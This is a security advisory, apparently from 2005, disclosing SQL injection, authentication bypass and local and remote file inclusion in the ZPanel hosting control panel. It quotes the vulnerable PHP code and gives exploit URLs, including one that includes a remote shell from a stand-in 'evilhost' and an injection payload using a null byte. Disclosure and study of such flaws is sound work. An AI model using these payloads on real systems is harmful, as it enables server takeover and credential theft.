Hello,
Few bugs have been discovered (accidently) in zPanel.
Developers were notified on 07.March but I have not received any response.
Best regards, Mikhail. -------------------------------------------------------------
[Product Description]
"ZPanel is a hosting control interface developed for both Windows and Linux hosts.
We will soon be developing two different distributions to fit the needs of both
platforms."
Tested:
ZPanel has been tested on the following server operating systems:
Windows Linux
2000 Advanced Server Fedora 2
2000 Server FreeBSD 4.9, 5.2.1
2003 Enterprise Server Mandrake 9.1, 9.2
XP RedHat 7.3, 9
Versions: Stable - ZPanel v2.0 Latest Beta - ZPanel v2.5b10
[Summary]
Successful exploitation of an input validation vulnerability in ZPanel scripts
allows attackers to execute SQL commands, include remote and local files,
get sensetive information.
[Details] [1] SQL injection #1
Vulnarable script: index.php
Vulnerable code:
--[code]--
if (isset($_POST['uname'])) {mysql_select_db($database_Customer_Database, $Customer_Database);
$query_TempUser = sprintf("SELECT * FROM custumerbase WHERE servicename = '".$_POST['uname']."'");
--[/code]--
Not sanitizing userinput variable outbounds directly into SQL query.
It is possible to inject arbitrary SQL statements through 'uname' variable and bypass the authentification.
In case of invalid user name or password user can see which parameter is wrong.
As result:
SQL onechar bruteforce technique allows to get sensitive information
(such as nonencrypted passwords in ZPanel v.2, and md5 hashes in ZPanel v.<=2.5 beta 10).
[2] SQL injection #2 and file inclusion
Vulnerable script: zpanel.php
Vulnerable code:
--[code v.2.5 beta]--
if (isset($_GET['page']) && $_GET['page'] != 'main') {
$query_Modules = sprintf("SELECT * FROM modules WHERE name = '".$_GET['page']."'");
$Modules = mysql_query($query_Modules, $Customer_Database) or die(mysql_error());
$row_Modules = mysql_fetch_assoc($Modules);
[...]
if ($row_Modules['active'] == '1') {
$body = "modules/" . $_GET['page'] . "/index.php";
--[/code]--
or
--[code v.2.0]--
if (!isset($_GET['page'])){
$body = "main.php";
}else{
$body = $_GET['page'] . ".php";
}
--[/code]--It is possible to include arbitrary file: local - in version ZPanel <= 2.5 beta 10, remote - in ZPanel 2.0.
[exploit for v 2.0] http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code script
[exploit for v 2.5 beta] http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1
Path disclosing avaliable in case of unsuccessfull exploitation of this bug.
[3] Installation By default, installation scripts are not taken away after installation.
http://localhost/ZPanel/admin/install.php
[4] Old scripts ZPanel uses old buggy scripts. For example phpBB Forums 2.0.8a.
[DISCLOSURE TIMELINE]
10-03-2005 Initial vendor notification.
[CREDITS & GREETS] Goes to GHC & specially to Foster
